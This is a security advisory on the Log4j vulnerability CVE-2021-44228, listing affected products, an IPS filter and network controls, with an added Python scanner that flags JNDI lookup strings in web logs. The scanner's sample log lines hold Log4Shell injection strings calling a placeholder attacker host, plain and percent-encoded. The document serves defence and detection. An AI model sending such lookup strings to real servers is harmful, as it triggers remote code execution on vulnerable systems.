Security Bulletin: 1091
Subject: Trend Micro TippingPoint Security Advisory for CVE-2021-44228
Date of Announcement: December 16, 2021

Summary:
On December 9, 2021, a new critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed that, if exploited, could result in Remote Code Execution (RCE) by logging a certain string on affected installations. Further details on this vulnerability can be found at: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

For the latest details on using TippingPoint and other Trend Micro products to combat this threat, please see the following article: https://success.trendmicro.com/solution/000289940

Product Impact:
Trend Micro's TippingPoint products TPS, vTPS, SMS, and vSMS are not affected by the zero-day vulnerability CVE-2021-44228. Neither TPS nor vTPS includes Java log4j software. The version of Java log4j software used in SMS and vSMS is not vulnerable. We will continue to dive deeper into this vulnerability and provide you with updates about our findings.

Recommended Actions:
#1. What filters should I look at?
Trend Micro's Threat Research team has released filter "40627: HTTP: JNDI Injection in HTTP Request" with Digital Vaccine #9621. Trend Micro recommends customers enable this filter in a block and notify posture for optimal coverage. Starting with Digital Vaccines released on 12/21/2021, it will be enabled by default. Since it may not be enabled in your environment, Trend Micro strongly recommends you confirm the filter is enabled in your policy.

#2. What other controls can be used to disrupt the attack?
This attack is successful when the exploit is used to initiate a transfer of a malicious attack payload. In addition to filter #40627, the following techniques can disrupt that chain.
• Geolocation: Geolocation filtering can be used to reduce possible attack vectors. Geolocation filtering can block inbound and outbound connections to any specified country, which may limit the ability for attackers to exploit the environment. In cases where a business only operates in certain regions of the globe, proactively blocking other countries may be advisable.
• For TippingPoint IPS, TPS, and vTPS products: Trend Micro also recommends enabling DNS and URL reputation as a proactive means of securing an environment from this vulnerability. Leveraging Trend Micro's rapidly evolving threat intelligence, TippingPoint appliances can help disrupt the chain of attack destined to known malicious hosts. Additionally, Reputation filtering can be leveraged to block anonymous proxies that are commonly used in exploit attempts. Any inbound or outbound connections to/from an anonymous proxy or anonymizer service can be blocked by configuring a reputation filter with "Reputation DV Exploit Type" set to "Tor Exit" to a Block action.
• For Cloud One – Network Security: Anonymous proxies are also an independent, configurable "region" that can be selected as part of Geolocation filtering. This will block any inbound or outbound connection to/from an anonymous proxy or anonymizer service, which can be commonly used as part of exploit attempts. Domain filtering can also be used to limit the attack vectors and disrupt the attack chain used to exploit this vulnerability. In this case, any outbound connection over TCP is dropped unless the domain being accessed is on a permit list. If the attacker's domain, e.g., http://attacker.com, is not on the permit list, then it would be blocked by default, regardless of the IPS filter policy.
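Filter 40627 (#1) looks for JNDI lookup strings in HTTP requests, and the controls in #2 block the outbound callback to the attacker's host. The following added example (not Trend Micro code, and not part of the bulletin) shows the same two ideas on a web server's own access log: it percent-decodes each request field, flags any ${jndi:...} lookup string, and pulls out the callback scheme and host so they can be fed to a reputation or domain block list. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not taken from the bulletin).
# Line 1 carries the lookup string in the User-Agent, line 2 percent-encoded in
# the query string, line 3 is benign. attacker.example is a placeholder host.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.8 - - [10/Dec/2021:10:01:05 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 88 "-" "curl/7.79"
198.51.100.4 - - [10/Dec/2021:10:02:10 +0000] "GET /health HTTP/1.1" 200 2 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A Log4j lookup string: ${jndi:<scheme>:...//<host>[:port]/...}
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+):/*(?P<host>[^:/}]+)', re.IGNORECASE)


def normalize(value: str) -> str:
    """Percent-decode until stable so encoded lookup strings are also matched."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str):
    """Return (client ip, field, scheme, callback host) for each lookup string in one line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    for field in ("request", "referer", "agent"):
        for j in JNDI_RE.finditer(normalize(m.group(field))):
            hits.append((m.group("ip"), field, j.group("scheme").lower(), j.group("host")))
    return hits


def scan_log(text: str):
    """Scan a whole log; the hosts returned are candidates for an outbound block list."""
    return [hit for line in text.splitlines() if line.strip() for hit in scan_line(line)]


if __name__ == "__main__":
    for ip, field, scheme, host in scan_log(SAMPLE_LOG):
        print(f"{ip}: JNDI lookup in {field} -> {scheme} callback to {host}")
```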
#3. The "Trend Micro Log4j Vulnerability Tester" can test your internet-facing services
Trend Micro Research has created a quick web-based testing tool that can help users and administrators identify server applications that may be affected by the Log4Shell vulnerability. The tool can be found at: https://log4j-tester.trendmicro.com/